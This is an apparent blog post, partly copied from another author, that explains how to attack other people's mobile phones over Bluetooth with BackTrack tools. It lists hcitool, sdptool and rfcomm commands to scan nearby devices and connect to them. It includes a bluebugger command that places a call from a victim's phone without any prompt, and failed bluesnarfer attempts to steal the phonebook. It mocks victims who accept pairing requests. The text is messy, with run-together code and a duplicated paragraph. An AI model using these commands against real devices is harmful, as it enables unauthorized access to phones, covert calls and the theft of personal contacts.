Assalam-0-Alikum,
Guyz jaceon requested me to write on how to hack the Bluetooth using backtrack so here we go , we i obviously searched it out and already learned it from somewhere ,and going to share the facts with you , Here Is The Tutorials Blue_ron by :
Scripts:
What do i have on my box
First, i wrote a script to configure my Bluetooth device so that i wouldn't have to keep typing every time i need to set it up. This is what it looks like#!/bin/shmkdir -p 666 /dev/bluetooth/rfcommmknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0mknod --mode=666 /dev/bluetooth/rfcomm0 c 216 0
# Firing up the bluetooth device#<code>hciconfig -a hci0 uphciconfig -a hci0 class 0x500204hciconfig -a hci0 lm accept, master;hciconfig -a hci0 lp rswitch,hold,sniff,park;hciconfig -a hci0 auth enablehciconfig -a hci0 encrypt enablehciconfig -a hci0 name ronsoft
Incase you want to change it by the file you can navigate to the bluetooth dir nano /etc/bluetooth/
Here you can have control of even more options by playing around with the conf files.
- > rfcomm.conf
- > network.conf
- > main.conf
Footprinting the remote device
Scan for devices:
hcitool scan hci0
hcitool info xx:xx:xx:xx:xx:xx
You can also ping the device to know it's range
l2ping xx:xx:xx:xx:xx:xx
sdptools browse --l2cap <xx:xx:xx:xx:xx:xx>
This will list all service, channels and alot info about the remote device. You may wonder how this could help, but this is the gold mine of bluetooth hacking. Take a pen and paper and note down the important services with their channel numbers, record handles and value attributtes. Famous ports:-
DUN - Dial up network
OBEX - Object exchange
OPUSH - Object push for file trasfer
SAP - Sim access
Update you sdp db
sdptool add --handle=<Rechandle> --channel=<channel> <service name>
sdptool add --handle = 0x10013 --channel = 4 SAP
Now the stress starts from here,. Trying to bind and then connect the rfcomm to the remote device.
rfcomm
rfcomm
rfcomm bind /dev/bluetooth/rfcomm xx:xx:xx:xx:xx:xx 4
rfcomm connect /dev/bluetooth/rfcomm xx:xx:xx:xx:xx:xx 4
rfcomm show
With the above code, my box turns into an error box. First i get the signals to the remote bluetooth phone but nothing can happen untill i accept the request from the phone. Well, the victim may by chance just hit the accept button without knowing..hahahahaaa....! After establishing connection the remote device needs a 16 digit number in order to complete the pairing!
Now guy, take the turn and tell me. How do you deal with this in your own world?
Tried bluesnarfer and bluebugger but still couldn't get so far. The funny thing is that i can make a call through to the remote device but i can't pull it's phonebook!
bluebugger -m Ron -c 7 -a xx:xx:xx:xx:xx:xx dail 9818303531
The phone goes through successfully even without making prompts accept from the screen light blink
These are some of the errors i get when i try it with bluesnarfer and more bluebugger.
bt_rfcomm_config failed
unable to create rfcomm connect
open /dev/bluetooth/rfcomm/0 connection refused
unable to create rfcomm connect
open /dev/bluetooth/rfcomm/0 connection refused
Can't connect RFCOMM socket:
tcget attr failed: Input / output error
bt_rfcomm_config() failed
tcget attr failed: Input / output error
bt_rfcomm_config() failed
rfcomm error connection 216 connection fail
RFCOMMDEV / bluetooth/ not connected.
i Know It is error but i dont found any solution on this if anyone can find it then here is a better refrence:
http://www.palowireless.com/infotooth/tutorial/rfcomm.asp
RFCOMMDEV / bluetooth/ not connected.
i Know It is error but i dont found any solution on this if anyone can find it then here is a better refrence:
http://www.palowireless.com/infotooth/tutorial/rfcomm.asp
if i am wrong in any case or if i get updated with more info on this topic i will let you know.
Zulqurnain jutt
0 Comments :
Post a Comment
Having Confusion ,oH Dear ask me in comments!!